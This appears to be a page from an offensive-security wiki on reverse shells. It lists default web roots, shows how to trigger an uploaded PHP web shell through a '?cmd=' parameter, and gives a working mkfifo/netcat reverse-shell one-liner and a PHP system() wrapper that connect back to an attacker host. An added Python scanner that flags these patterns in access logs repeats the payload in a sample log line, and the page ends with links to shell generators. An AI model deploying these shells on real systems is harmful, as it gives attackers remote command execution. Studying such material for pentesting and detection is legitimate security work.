The VX-Files
  • For updates, questions, suggestions or just chatting: @malcrvz
  • Download your own local copy or check my other libre projects: Github/malcrvz

Reverse Shells

Last updated 1 year ago

Command injection

To execute the reverse shell, we first need to be able to inject commands; see the Command injection page (Web App pentesting > Techniques).


Default webroot for common web servers

Web server   Default webroot
Apache       /var/www/html/
Nginx        /usr/local/nginx/html/
IIS          C:\inetpub\wwwroot\
XAMPP        C:\xampp\htdocs\

Accessing the reverse shell

# Listen for the reverse shell with netcat
nc -lnvp listeningPort

# Once the malicious shell script has been passed to the victim, trigger it:
## In the browser
http://server_ip:port/shellScript.php?cmd=your_command_here

## Directly from the terminal (quote the URL so the local shell does not interpret "?")
curl "http://server_ip:port/shellScript.php?cmd=your_command_here"

Scripts

PHP

# Get a netcat reverse shell (named pipe /tmp/f relays the shell's I/O to nc)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerIP listeningPort >/tmp/f

## Adapted for PHP
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerIP listeningPort >/tmp/f"); ?>
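
Seen from the defending side, the `?cmd=` access pattern and the mkfifo/netcat one-liner above leave recognizable traces in web-server access logs. The following is an added example, not part of the original page: a small Python scanner run over constructed combined-format log lines; the parameter watch-list, token patterns, IP addresses, port and paths are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:10:02:11 +0000] "GET /uploads/shellScript.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
203.0.113.9 - - [10/Mar/2024:10:02:40 +0000] "GET /uploads/shellScript.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20198.51.100.5%204444%20%3E%2Ftmp%2Ff HTTP/1.1" 200 0 "-" "curl/8.5.0"
198.51.100.20 - - [10/Mar/2024:10:03:00 +0000] "GET /search.php?q=netcat+tutorial HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Assumed watch-list of parameter names that web shells commonly read commands from.
EXEC_PARAMS = {"cmd", "exec", "command"}
# Shell syntax that has no business appearing in a decoded query value.
SHELL_TOKENS = re.compile(r"mkfifo|/bin/(?:ba)?sh\b|\bnc\b|[;|`]|\$\(|>\s*/tmp/")
# client, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def score_request(target):
    """Return the reasons a request target looks like web-shell use."""
    parts = urlsplit(target)
    reasons = []
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in EXEC_PARAMS and parts.path.lower().endswith(".php"):
            reasons.append(f"exec-style parameter '{name}' on a PHP script")
        if SHELL_TOKENS.search(value):
            reasons.append(f"shell syntax in parameter '{name}'")
    return reasons


def scan(log_text):
    """Return one finding per suspicious request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, _method, target, status = m.groups()
        reasons = score_request(target)
        if reasons:
            findings.append({"client": client, "path": urlsplit(target).path,
                             "status": int(status), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response to a flagged request under an upload directory is the case to triage first, since it means the script exists and was executed by the server.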

Online shell lists/generators

Revshells - Online Reverse Shell Generator

PayloadsAllTheThings - Reverse Shell Cheatsheet.md (swisskyrepo/PayloadsAllTheThings on GitHub)